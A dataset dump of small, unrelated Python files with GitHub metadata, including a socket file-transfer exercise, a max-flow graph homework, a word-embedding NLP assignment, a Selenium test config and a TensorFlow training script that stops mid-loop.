'version.patch': patch,
'version.raw': MOCK_VERSION,
}
datadog_agent.assert_metadata('test:123', version_metadata)
| [
"[email protected]"
] | |
d66f55673cf2057f85cac998e95c9393c4a3fc95 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/neal.py | a9b23af628c29baef5be38fc3499691d0ef5fd97 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 274 | py | ii = [('CookGHP3.py', 1), ('WilbRLW4.py', 1), ('AdamWEP.py', 1), ('ClarGE2.py', 3), ('AdamHMM.py', 1), ('ClarGE.py', 11), ('GilmCRS.py', 1), ('DaltJMA.py', 1), ('GodwWLN.py', 2), ('SoutRD2.py', 3), ('WheeJPT.py', 2), ('MereHHB.py', 1), ('DibdTRL.py', 1), ('SadlMLP2.py', 1)] | [
"[email protected]"
] | |
618c8454e39c26836efdcd1b025c4b926ae44d83 | 67ef0a3f31c141e0cb156cb3d278091e63b32dfd | /0x07-python-test_driven_development/4-print_square.py | 5c4a6a2d4961caeeb26163218545e2b26947a288 | [] | no_license | Orcha02/holbertonschool-higher_level_programming | 7078ac665f027b845a55a8499764cfce78d89eec | 1d0136aef388ede1ecbe625b303e07c177fee52e | refs/heads/main | 2023-08-22T10:04:56.495834 | 2021-09-23T02:56:36 | 2021-09-23T02:56:36 | 361,823,730 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | #!/usr/bin/python3
""" Function that prints a square """
def print_square(size):
""" function that prints a square with the character #. """
if type(size) is not int:
raise TypeError("size must be an integer")
if size < 0:
raise ValueError("size must be >= 0")
if type(size) is float and size < 0:
raise TypeError("size must be an integer")
for i in range(size):
print("{}".format("#" * size))
| [
"[email protected]"
] | |
cba11837296d1468a2f7aad89d33ddce44995fda | 388e054480b4a26e602b213967e3c4bec9ae96d5 | /server.py | 2237b54355bd547c3c26e68f67605a0f0f4a4c09 | [] | no_license | budinugroho13/Ftp-sederhana | b035211602269e450ffc3552203d96af4e807f7a | cf2accb3faa3921aca37163d35524c6b99eeaff5 | refs/heads/master | 2022-04-19T14:09:10.748831 | 2020-04-16T05:18:30 | 2020-04-16T05:18:30 | 256,115,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,774 | py | # import socket
# import tqdm
# import os
# # ip addres yang digunakan
# SERVER_HOST = "0.0.0.0"
# SERVER_PORT = 5001
# # menerima 4096
# BUFFER_SIZE = 4096
# SEPARATOR = "<SEPARATOR>"
# # membuat socket
# # TCP socket
# s = socket.socket()
# # bind socket sebagai local address
# s.bind((SERVER_HOST, SERVER_PORT))
# s.listen(5)
# print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
# # menerima koneksi
# client_socket, address = s.accept()
# # jika ada user konek akan tereksekusi
# print(f"[+] {address} is connected.")
# # menerima info file
# received = client_socket.recv(BUFFER_SIZE).decode()
# filename, filesize = received.split(SEPARATOR)
# filename = os.path.basename(filename)
# # mengubah string menjad integer
# filesize = int(filesize)b
# # mulai menerima file dari socket
# progress = tqdm.tqdm(range(
# filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024)
# with open(filename, "wb") as f:
# for _ in progress:
# bytes_read = client_socket.recv(BUFFER_SIZE)
# if not bytes_read:
# break
# # menulis besaran bytes file yang di terima
# f.write(bytes_read)
# # update progress bar grafik
# progress.update(len(bytes_read))
# client_socket.close()
# s.close()
import socket # Import socket module
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 12345 # Reserve a port for your service.
s.connect((host, port))
s.send(b"Hello masbud!")
f = open('coba.txt','rb')
print ('downloading...')
l = f.read(1024)
while (l):
print ('downloading...')
s.send(l)
l = f.read(1024)
f.close()
print ("Done downloading")
print (s.recv(1024))
s.close
| [
"[email protected]"
] | |
ee7ad7136607639eb8a04211e9c3183c5cecb2e7 | 707723ab7908db14c2caa0a3f590bae1ef4ae8ac | /data/ageBuild/rd_btx_ageb.py | beed4c8deebb91f86701de2caeb663ef2bbbd4c8 | [] | no_license | mvalari/EXPLUME | a57e9cd320bb7519267af599ae6fa763956b286f | f90d4474ca54e29fec872ea7016a51b93f7a3bcb | refs/heads/master | 2020-06-25T01:05:55.354526 | 2019-03-04T14:21:27 | 2019-03-04T14:21:27 | 199,148,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,481 | py | import pickle
import numpy as np
ageBins=[]#=[0, 15, 20, 25, 40, 55, 65, 80]
cnsDates=[]
comIds=[]
#Read once to get comIds, ageBins, and dates
f=open('BTX_TD_AGEB_2008.ins','r')
for i,ln in enumerate(f):
if i>0:
comId,sex,age,type,ageB,cnt=ln.split()
if comId not in comIds:comIds.append(comId)
if age not in ageBins:ageBins.append(age)
if ageB not in cnsDates:cnsDates.append(ageB)
data2d={}
for com in comIds:
data2d[com]={}
data2d[com]=np.zeros((len(ageBins),len(cnsDates)))
ageBins=sorted(ageBins)
cnsDates=sorted(cnsDates)
f.seek(0)
for i,ln in enumerate(f):
if i>0:
comId,sex,age,type,ageB,cnt=ln.split()
data2d[comId][ageBins.index(age),cnsDates.index(ageB)]=data2d[comId][ageBins.index(age),cnsDates.index(ageB)]+int(cnt)
f.close()
data2dr={}
for com in data2d.keys():
data2dr[com]=np.zeros((4,18))
data2dr[com][0,:]=np.array([round(i) for i in 0.25*data2d[com][1,:]])
data2dr[com][1,:]=np.array([round(i) for i in 0.75*data2d[com][1,:]])
data2dr[com][2,:]=data2d[com][2,:]+data2d[com][3,:]+data2d[com][4,:]+data2d[com][5,:]
data2dr[com][3,:]=data2d[com][6,:]+data2d[com][7,:]
fout=open('BUILDING_AGE_MVAL.ins','w')
for com in data2dr.keys():
for date in range(len(cnsDates)):
fout.write(com +' ; '+str(int(data2dr[com][0,date])) +' ; '+str(int(data2dr[com][1,date])) +' ; '+str(int(data2dr[com][2,date])) +' ; '+str(int(data2dr[com][3,date])) +' ; '+str(cnsDates[date])+'\n')
fout.close()
| [
"[email protected]"
] | |
210775055ec3d9710db431bf6467c57b98377d24 | 5e260d0cde3e77f310bb80ba48319376c067b989 | /Tarea5/GrafoTarea5.py | 2740b2c59c96b74a086330da0f78fdb09f8a7ae2 | [] | no_license | EvelyGutierrez/Optimizacion-de-flujo-de-redes | 4f0674d945ca1ef7305c75e5f81b48e67f3317eb | 6f2405847022cc230fcfc9ddbe5a5e9a60cd86d6 | refs/heads/master | 2021-05-09T09:48:25.294949 | 2018-05-27T21:14:43 | 2018-05-27T21:14:43 | 119,458,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,086 | py | from random import random, uniform, randint, gauss, expovariate
from math import sqrt, ceil, floor, factorial, cos, sin, pi
from datetime import datetime
from time import clock
def cabecera(aristas, k, eps=True):
if eps:
print("set term postscript color eps", file = aristas)
print("set output 'GrafoGrid.eps'", file = aristas)
else:
print("set term png", file = aristas)
print("set output 'GrafoGrid.png'", file = aristas)
print('set xrange [-1:', k , ']', file = aristas)
print('set yrange [-1:', k , ']', file = aristas)
print('set size square', file = aristas)
print('set key off', file = aristas)
def pie(destino, aristas):
print("plot '{:s}' using 1:2 with points pt 5 ps 1".format(destino), file = aristas)
class Grafo:
def __init__(self):
self.x = dict()
self.y = dict()
self.nodos = dict()
self.aristas = []
self.vecinos = dict()
self.peso = 1
self.destino = None
def agregaNodos(self,v,x,y):
self.nodos[v] = (x,y)
if not v in self.vecinos: # vecindad de v
self.vecinos[v] = set() # inicialmente no tiene nada
with open("GraficaNodos.txt", 'a') as archivo:
print(x,y,v, file = archivo)
def puntos(self, dest, k):
self.destino = dest
with open(self.destino, 'w') as puntos:
it= 0
for i in range(k):
for j in range(k):
x = i
y = j
self.agregaNodos(it,x,y)
it += 1
# print("nodos")
#print(self.nodos)
def Grafica(self, plot, k): # imprimiendo el grafo con aristas
assert self.destino is not None
with open(plot, 'w') as puntos:
cabecera(puntos, k)
num = 1
for (v, w, p, c) in self.aristas:
(x1, y1) = self.nodos[v]
(x2, y2) = self.nodos[w]
flecha = "set arrow {:d} from {:f}, {:f} to {:f}, {:f} lt 3 lw {:f} lc rgb '{:s}' nohead ".format(num,x1,y1,x2,y2,p, c)
print(flecha, file=puntos)
num += 1
pie(self.destino, puntos)
print(len(self.aristas))
def GraficaNodos(self, plot, k):
with open(plot, 'w') as puntos:
cabecera(puntos, k)
puntoss = "plot 'GraficaNodos.txt' with points pt 4"
print(puntoss, file=puntos)
def getManhattan(self, a,b):
(x1, y1) = self.nodos[a]
(x2, y2) = self.nodos[b]
dx = abs(x1 - x2)
dy = abs(y1 - y2)
md = dx + dy
return(md)
def manhattan(self, k, l, p):
mu = 10
sigma = 5
lmbd = 2
color = 'black'
cantidad = 0
peso1 = 0
peso2 = 0
#conecciones l
for i in self.nodos:
for j in self.nodos:
if (self.getManhattan(i,j) <= l):
peso1 = gauss(mu,sigma)
peso1 = abs(int(peso1))+1
self.aristas.append((i, j, peso1, color))
self.aristas.append((j, i, peso1, color))
self.vecinos[i].add(j)
self.vecinos[j].add(i)
elif (random() < p) :
color2 = 'blue'
cantidad += 1
peso2 = expovariate(lmbd)*mu/4
peso2 = abs(int(peso2))+1
self.aristas.append((i, j, peso2, color2))
self.vecinos[i].add(j)
#print('Cantidad de aristas aleatorias ')
#print(cantidad)
print("Aristas******")
print(len(self.aristas))
#print(self.vecinos)
def camino(self, s, t, f): # construcción de un camino aumentante
cola = [s]
usados = set()
camino = dict()
while len(cola) > 0:
u = cola.pop(0)
usados.add(u)
for (w, v, p, c) in self.aristas:
if w == u and v not in cola and v not in usados:
actual = f.get((u, v), 0)
dif = p - actual
if dif > 0:
cola.append(v)
camino[v] = (u, dif)
if t in usados:
return camino
else: # no se alcanzó
return None
def FordFulkerson(self, s, t): # algoritmo de Ford y Fulkerson
if s == t:
return 0
maximo = 0
f = dict()
while True:
aum = self.camino(s, t, f)
if aum is None:
break # ya no hay
incr = min(aum.values(), key = (lambda k: k[1]))[1]
u = t
while u in aum:
v = aum[u][0]
actual = f.get((v, u), 0) # cero si no hay
inverso = f.get((u, v), 0)
f[(v, u)] = actual + incr
f[(u, v)] = inverso - incr
u = v
maximo += incr
return maximo
def EliminaArista(self, u,v):
f = self.aristas[u]
g = self.aristas[v]
#print(f)
print(g)
self.aristas.remove(f)
self.aristas.remove(g)
#print(self.vecinos)
self.vecinos[u].remove(v)
if not f:
self.vecinos[v].remove(u)
print(len(self.aristas))
def EliminaNodo(self, u):
vecindad = self.vecinos[u].copy()
for i in vecindad:
print("quité arista con",i)
self.EliminaArista(u,i)
for n in self.nodos:
if u in self.vecinos[n]:
print("uy quité arista con",n)
self.EliminaArista(n,u)
h = self.nodos.pop(u)
print(self.nodos)
print(len(self.aristas))
def PlotDiagrama1(self, plot, diagrama): #Diagrama de tiempos
with open(plot, "w") as diagrama:
print("set term postscript color eps", file = diagrama)
print("set output 'DiaLVSFlujo.eps'", file = diagrama)
print("set key off", file = diagrama)
print("set xlabel 'Flujo Máximo'", file = diagrama)
print("set ylabel 'Valores de Distancia L'", file = diagrama)
#set logscale y
print("set style fill solid 0.25 border -1", file = diagrama)
print("set style line 1 lt 1 linecolor rgb 'blue' lw 2 pt 1", file = diagrama)
print("set style data boxplot", file = diagrama)
#f(x) = 150 * exp(x) - 12
diagrama1 = "plot 'TiempoLVSFM.txt' using 1:2 ls 1 title 'Distancias VS Flujo Máximo' with lines "
print(diagrama1, file=diagrama)
def PlotDiagrama2(self, plot, diagrama): #Diagrama de tiempos
with open(plot, "w") as diagrama:
print("set term postscript color eps", file = diagrama)
print("set output 'DiaArisVSFlujo.eps'", file = diagrama)
print("set key off", file = diagrama)
print("set xlabel 'Flujo Máximo'", file = diagrama)
print("set ylabel 'Aristas Eliminadas'", file = diagrama)
#set logscale y
print("set style fill solid 0.25 border -1", file = diagrama)
print("set style boxplot outliers pointtype 7", file = diagrama)
print("set style data boxplot", file = diagrama)
#f(x) = 150 * exp(x) - 12
diagrama2 = "plot 'AristasVSFlujo.txt' using 1:2 "
print(diagrama2, file=diagrama)
k = 20
n = k * k
l = 2
x = 0
flujoMaximo = []
fo = 10
cantAristas = 0
with open("AristasVSFlujo.txt", "a") as f:
with open("TiempoEjecucion.txt", "a") as d:
for t in range(0, 1):
print("Iteracion ------------------------------------------ " + str(l))
G1 = Grafo()
G1.puntos("GraficaNodos.txt", k)
G1.GraficaNodos("NodosGrid.plot", k)
#G1.quitar_nodo(3)
TiempoInicial = clock() # Tiempo Inicial
G1.manhattan(k, l, p = 0.008)
#FlujoMaximo = G1.FordFulkerson(0, n - 1)
#print("Flujo Original")
#print(FlujoMaximo)
G1.Grafica("GrafoGrid.plot", k)
FlujoMaximo=0
for x in range(0, fo):
print(x)
cantAristas = cantAristas + 2
G1.EliminaArista(x, x+1)
#G1.EliminaNodo(5)
FlujoMaximo = G1.FordFulkerson(0, n - 1)
print('Flujo maximo eliminando')
print(FlujoMaximo)
flujoMaximo.append( FlujoMaximo)
f.write('{} {} {} \n'.format(cantAristas , fo, '%.2f' % FlujoMaximo))
TiempoFinal = clock() - TiempoInicial
d.write('{} {} \n'.format('%.2f' % TiempoFinal, '%.2f' % x))
print("Tiempo de ejecucion: ")
print(TiempoFinal)
l += 1
G1.PlotDiagrama2("DiaAriVSFlujo.plot", "AristasVSFlujo")
| [
"[email protected]"
] | |
d649d41ce316b48c42f29c9f9d76f08d614277f3 | 93e298426c8bc05af9c6dc9ba0d15386a862ada0 | /guess v.0.1.1.py | 042d33c1099960bdd2c365e5371ffa4f207e4262 | [] | no_license | MagicBackup2018/SchoolProject1 | de37d24500052495a164192dea346c2441152837 | a89d2502f1b83445e967fa7a1f1fb97cd3af71ac | refs/heads/master | 2020-04-10T01:51:38.624991 | 2018-12-07T11:04:46 | 2018-12-07T11:04:46 | 160,727,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,798 | py | """Bagels, a number puzzle game.
Exercises:
1. Can you guess the number?
2. How much harder is 6 digits? Do you need more guesses?
3. What's the maximum number of digits we could support?
Adapted from code in https://inventwithpython.com/chapter11.html
"""
from random import sample, shuffle
digits = 3
guesses = 10
print('I am thinking of a', digits, 'digit number.')
print('Try to guess what it is.')
print('Here are some clues:')
print('When I say: That means:')
print(' pico One digit is correct but in the wrong position.')
print(' fermi One digit is correct and in the right position.')
print(' bagels No digit is correct.')
print('There are no repeated digits in the number.')
# Create a random number.
letters = sample('0123456789', digits)
if letters[0] == '0':
letters.reverse()
number = ''.join(letters)
print('I have thought up a number.')
print('You have', guesses, 'guesses to get it.')
counter = 1
while True:
print('Guess #', counter)
guess = input()
if len(guess) != digits:
print('Wrong number of digits. Try again!')
continue
# Create the clues.
clues = []
for index in range(digits):
if guess[index] == number[index]:
clues.append('fermi')
elif guess[index] in number:
clues.append('pico')
shuffle(clues)
if len(clues) == 0:
print('bagels')
else:
print(' '.join(clues))
counter += 1
if guess == number:
print('You got it! in ' , counter , 'Guesses')
print('Least no. of Guesses is' , counter_least)
break
if counter > guesses:
print('You ran out of guesses. The answer was', number)
break
| [
"[email protected]"
] | |
9e169041eceb4d706cd68dba965f55dd679f9a94 | c305a0971486efd74b688b43d14432afd99f91e8 | /assignments/weekly3/C1_W3_Assignment.py | 4fbbcd413cdc97b267c49f1151739a8749edc864 | [] | no_license | ckharide/nlplearn | cba1e435bbfd39dda7b15e6f974c63c605a35ede | b614b8c780fdb1064443137de04ef46756aad216 | refs/heads/main | 2023-04-16T08:18:55.620804 | 2021-04-27T12:49:49 | 2021-04-27T12:49:49 | 352,520,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,186 | py | import pickle
import numpy as np
import pandas as pd
#import matplotlib.pyplot as plt
from utils import get_vectors
data = pd.read_csv('capitals.txt', delimiter=' ')
data.columns = ['city1', 'country1', 'city2', 'country2']
# print first five elements in the DataFrame
print(data.head(5))
print(data.shape)
word_embeddings = pickle.load(open("word_embeddings_subset.p", "rb"))
print("Length of word embeddigns " , len(word_embeddings)) # there should be 243 words that will be used in this assignment
#print("dimension: {}".format(word_embeddings['Germany']))
def cosine_similarity(A, B):
'''
Input:
A: a numpy array which corresponds to a word vector
B: A numpy array which corresponds to a word vector
Output:
cos: numerical number representing the cosine similarity between A and B.
'''
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
dot = np.dot(A,B)
norma = np.linalg.norm(A)
normb = np.linalg.norm(B)
cos = dot / (norma * normb)
### END CODE HERE ###
return cos
king = word_embeddings['king']
queen = word_embeddings['queen']
print(cosine_similarity(king, queen))
def euclidean(A, B):
"""
Input:
A: a numpy array which corresponds to a word vector
B: A numpy array which corresponds to a word vector
Output:
d: numerical number representing the Euclidean distance between A and B.
"""
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# euclidean distance
d = np.linalg.norm(A-B)
### END CODE HERE ###
return d
print(euclidean(king, queen))
def get_country(city1, country1, city2, embeddings):
"""
Input:
city1: a string (the capital city of country1)
country1: a string (the country of capital1)
city2: a string (the capital city of country2)
embeddings: a dictionary where the keys are words and values are their embeddings
Output:
countries: a dictionary with the most likely country and its similarity score
"""
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# store the city1, country 1, and city 2 in a set called group
group = set((city1, country1, city2))
# get embeddings of city 1
city1_emb = embeddings[city1]
# get embedding of country 1
country1_emb = embeddings[country1]
# get embedding of city 2
city2_emb = embeddings[city2]
# get embedding of country 2 (it's a combination of the embeddings of country 1, city 1 and city 2)
# Remember: King - Man + Woman = Queen
vec = country1_emb - city1_emb + city2_emb
# Initialize the similarity to -1 (it will be replaced by a similarities that are closer to +1)
similarity = -1
# initialize country to an empty string
country = ''
# loop through all words in the embeddings dictionary
for word in embeddings.keys():
# first check that the word is not already in the 'group'
if word not in group:
# get the word embedding
word_emb = word_embeddings[word]
# calculate cosine similarity between embedding of country 2 and the word in the embeddings dictionary
cur_similarity = cosine_similarity(word_emb,vec)
# if the cosine similarity is more similar than the previously best similarity...
if cur_similarity > similarity:
# update the similarity to the new, better similarity
similarity = cur_similarity
# store the country as a tuple, which contains the word and the similarity
country = (word, similarity)
### END CODE HERE ###
return country
country_pred = get_country('Athens', 'Greece', 'Cairo', word_embeddings)
print(country_pred)
def get_accuracy(word_embeddings, data):
'''
Input:
word_embeddings: a dictionary where the key is a word and the value is its embedding
data: a pandas dataframe containing all the country and capital city pairs
Output:
accuracy: the accuracy of the model
'''
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# initialize num correct to zero
num_correct = 0
# loop through the rows of the dataframe
for i, row in data.iterrows():
# get city1
city1 = row['city1']
# get country1
country1 = row['country1']
# get city2
city2 = row['city2']
# get country2
country2 = row['country2']
# use get_country to find the predicted country2
predicted_country2, _ = get_country(city1 , country1 , city2 , word_embeddings)
# if the predicted country2 is the same as the actual country2...
if predicted_country2 == country2:
# increment the number of correct by 1
num_correct += 1
# get the number of rows in the data dataframe (length of dataframe)
m = len(data)
# calculate the accuracy by dividing the number correct by m
accuracy = num_correct / m
### END CODE HERE ###
return accuracy
accuracy = get_accuracy(word_embeddings, data)
print(f"Accuracy is {accuracy:.2f}")
def compute_pca(X, n_components=2):
"""
Input:
X: of dimension (m,n) where each row corresponds to a word vector
n_components: Number of components you want to keep.
Output:
X_reduced: data transformed in 2 dims/columns + regenerated original data
"""
print("Shape of X " , X.shape[1])
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# mean center the data
X_demeaned = X - np.mean(X, axis=0)
# calculate the covariance matrix
covariance_matrix = np.cov(X, rowvar=False)
# calculate eigenvectors & eigenvalues of the covariance matrix
eigen_vals, eigen_vecs = np.linalg.eigh(np.cov(covariance_matrix))
# sort eigenvalue in increasing order (get the indices from the sort)
idx_sorted = np.argsort(eigen_vals)
# reverse the order so that it's from highest to lowest.
idx_sorted_decreasing = idx_sorted[::-1]
# sort the eigen values by idx_sorted_decreasing
eigen_vals_sorted = eigen_vals[idx_sorted_decreasing]
# sort eigenvectors using the idx_sorted_decreasing indices
eigen_vecs_sorted = eigen_vecs[:,idx_sorted_decreasing]
# select the first n eigenvectors (n is desired dimension
# of rescaled data array, or dims_rescaled_data)
eigen_vecs_subset = eigen_vecs_sorted[:,0:n_components]
# transform the data by multiplying the transpose of the eigenvectors
# with the transpose of the de-meaned data
# Then take the transpose of that product.
print(eigen_vecs_subset.T.shape)
print(X_demeaned.T.shape)
print(X_demeaned.shape)
X_reduced = np.dot(eigen_vecs_subset.transpose(),X_demeaned.transpose()).transpose()
### END CODE HERE ###
return X_reduced
np.random.seed(1)
X = np.random.rand(3, 10)
X_reduced = compute_pca(X, n_components=2)
print("Your original matrix was " + str(X.shape) + " and it became:")
print(X_reduced)
print(np.asscalar(np.array([1 , 2 , 1])))
| [
"[email protected]"
] | |
b13b4d3b13b0518c818531117f412a5f56a71c10 | 74a6414e6ea1af00d66ba92f0a62e3a6eaf0fff9 | /public/publicMethod.py | 0483fb9fd6706f6c46310c80fc69a9d083fd9d5a | [] | no_license | blanchede/jobtest | 717b586852fe669d49efc8e98cddc5f7511899f2 | 16e354a4673c236af55e29a2964162ec43e91e92 | refs/heads/master | 2021-01-01T17:51:50.999708 | 2017-07-28T07:01:49 | 2017-07-28T07:01:49 | 98,182,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,612 | py | #!/user/bin/env python
# -*-coding:utf-8-*-
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
from time import sleep
#启动chromdriver
driver = webdriver.Remote(command_executor='http://localhost:9515',
desired_capabilities=DesiredCapabilities.CHROME)
#测试地址
#testUrl="http://devtest.leadswarp.com"
testUrl="http://localhost:4200/"
#testUrl="http://106.14.139.106:80"
#登录需要信息
#测试用户名和密码
userName = "[email protected]"
password = "demo"
#登录按钮XPath
loginXpath = "/html/body/app-root/app-login/div/div/div/div[2]/form/button"
#主界面联系人按钮
contactXpath = "//li[3]/div/a/i"
settingXpath = "//a[@title='设置']/parent::div"
#测试分组固定信息
targetGroupName = "targetGroupTest1"
folderName = "folderTest1"
newTargetGroupName = "targetGroupTest2"
newFolderName = "folderTest2"
#公用方法 元素是否存在
class CommonMethod():
def isElementExist(Xpath):
s = driver.find_elements(By.XPATH, Xpath)
if len(s) == 0:
print("元素未找到:%s" % Xpath)
return False
elif len(s) == 1:
return True
else:
print("找到%s个元素:%s" % (len(s), Xpath))
return False
def is_element_present(self, what):
try:
self.driver.find_element(By.XPATH, what)
except NoSuchElementException as e:
return False
return True
| [
"[email protected]"
] | |
1bcdd525c0ab3623c6d017154cb036bf15b79a66 | 3950896bb3dcf9a03a9682a17b42bfa3feda3885 | /src/vaytrou/vaytrou/tests.py | d931ef4e7366752af20398333357cc1120abb5ae | [] | no_license | sgillies/vaytrou | c02c38579565ddb0d1782600537113e9eafb38b0 | 89385800491f36a774e8fc4eddd79952a982f115 | refs/heads/master | 2016-09-09T22:54:00.789976 | 2013-06-21T23:29:19 | 2013-06-21T23:29:19 | 884,337 | 2 | 1 | null | 2016-02-26T00:04:56 | 2010-09-02T20:59:45 | Python | UTF-8 | Python | false | false | 1,063 | py | import shutil
import tempfile
import vaytrou.admin
# Admin tests
def test_admin():
admin = vaytrou.admin.IndexAdmin()
def foo(*args):
pass
admin.foo = foo
admin.run(['foo', 'bar', 'x'])
admin.run(['help', 'info'])
admin.run(['info', '--help'])
def test_ro_commands():
data = tempfile.mkdtemp()
admin = vaytrou.admin.IndexAdmin()
admin.run(['-d', data, 'create', 'foo'])
admin.run(['-d', data, 'info', 'foo'])
admin.run(['-d', data, 'dump', 'foo'])
admin.run(['-d', data, 'search', 'foo', '--', '0,0,0,0'])
shutil.rmtree(data)
def test_batch():
data = tempfile.mkdtemp()
admin = vaytrou.admin.IndexAdmin()
admin.run(['-d', data, 'create', 'foo'])
admin.run(['-d', data, 'batch', 'foo', '-f', 'index-st99_d00.json'])
admin.run(['-d', data, 'dump', 'foo'])
shutil.rmtree(data)
def test_pack():
data = tempfile.mkdtemp()
admin = vaytrou.admin.IndexAdmin()
admin.run(['-d', data, 'create', 'foo'])
admin.run(['-d', data, 'pack', 'foo'])
shutil.rmtree(data)
| [
"[email protected]"
] | |
8a7403ed5ad850d888a8b77975d30d6748ac5cfd | 38d00b7c5335ecfeee9cd8efdc0d5526ac60102c | /lenskit/algorithms/tf/__init__.py | dc8c5ce09959e2b4f476bf9f2d8171857ee515fb | [
"MIT"
] | permissive | carlos10seg/lkpy | ce07791f241099a4c1e844ba802c7da37e379fb7 | 7bb2b78a5315a19a182a3d64995c48dbbd42d9d8 | refs/heads/master | 2023-01-19T02:04:57.192293 | 2020-11-24T00:06:39 | 2020-11-24T00:06:39 | 266,886,328 | 0 | 0 | MIT | 2020-11-23T23:50:32 | 2020-05-25T21:45:48 | Python | UTF-8 | Python | false | false | 500 | py | """
TensorFlow-based algorithms.
"""
import logging
from .util import have_usable_tensorflow
from .biasedmf import BiasedMF # noqa: F401
from .ibmf import IntegratedBiasMF # noqa: F401
from .bpr import BPR # noqa: F401
from lenskit.util.parallel import is_mp_worker
TF_AVAILABLE = have_usable_tensorflow()
_log = logging.getLogger(__name__)
if TF_AVAILABLE and is_mp_worker():
_log.info('disabling GPUs in worker process')
_tf.config.set_visible_devices([], 'GPU')
| [
"[email protected]"
] | |
0878fdbae5fcd996435a304fd52aa773374222d7 | 90c6262664d013d47e9a3a9194aa7a366d1cabc4 | /tests/storage/cases/test_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE.py | 4e3422ecc498a42b1713e07178bccf64f7472514 | [
"MIT"
] | permissive | tqtezos/pytezos | 3942fdab7aa7851e9ea81350fa360180229ec082 | a4ac0b022d35d4c9f3062609d8ce09d584b5faa8 | refs/heads/master | 2021-07-10T12:24:24.069256 | 2020-04-04T12:46:24 | 2020-04-04T12:46:24 | 227,664,211 | 1 | 0 | MIT | 2020-12-30T16:44:56 | 2019-12-12T17:47:53 | Python | UTF-8 | Python | false | false | 1,130 | py | from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE.json')
def test_storage_encoding_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| [
"[email protected]"
] | |
88b2ed689b8e719c2649a84df2cfec7bea1dc0c8 | 4e2b98c0cc67c447ea1421ae6fbe38842e354024 | /train_fuits.py | b3e5807f651762b98847abbe4d55fb2c87e7c1af | [] | no_license | rancher43/fruit_mnist | 6c5e3e5f8005de03dd50c1d4fbe78742eac61ce8 | 34c487352f2e4f7d2172fa16539249ce9a7378de | refs/heads/master | 2022-04-13T05:31:35.598412 | 2020-04-10T20:01:07 | 2020-04-10T20:01:07 | 254,723,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,464 | py | import tensorflow as tf
import numpy as np
from tensorflow.keras.layers import Dense, Flatten, Conv2D, MaxPool2D, Dropout
from tensorflow.keras import Model
import pickle
print('tensorflow version: ' + tf.__version__)
train_images_file = open('train_images', 'rb')
train_images = pickle.load(train_images_file)
train_images_file.close()
train_labels_file = open('train_labels', 'rb')
train_labels = pickle.load(train_labels_file)
train_labels_file.close()
train_ds = tf.data.Dataset.from_tensor_slices((train_images, train_labels)).shuffle(10000).batch(32)
# print(train_ds)
del train_images
del train_labels
import gc
gc.collect()
class CNNModel(Model):
def __init__(self):
super(CNNModel, self).__init__()
self.conv1 = Conv2D(32, 3, padding='same', activation='relu')
self.pool1 = MaxPool2D((2, 2))
self.conv2 = Conv2D(64, 3, padding='same', activation='relu')
self.pool2 = MaxPool2D((2, 2))
self.flatten = Flatten()
self.d1 = Dense(512, activation='relu')
self.dropout1 = Dropout(0.4)
self.d2 = Dense(128, activation='relu')
self.dropout2 = Dropout(0.4)
self.d3 = Dense(3, activation='softmax')
def call(self, x):
x = self.conv1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.pool2(x)
x = self.flatten(x)
x = self.d1(x)
x = self.dropout1(x)
x = self.d2(x)
x = self.dropout2(x)
x = self.d3(x)
return x
model = CNNModel()
loss_object = tf.keras.losses.CategoricalCrossentropy()
optimizer = tf.keras.optimizers.Adam()
train_loss = tf.keras.metrics.Mean(name='train_loss')
train_accuracy = tf.keras.metrics.CategoricalAccuracy(name='train_accuracy')
@tf.function
def train_step(images, labels):
with tf.GradientTape() as tape:
predictions = model(images)
loss = loss_object(labels, predictions)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
train_loss(loss)
train_accuracy(labels, predictions)
epochs = 5
for epoch in range(epochs):
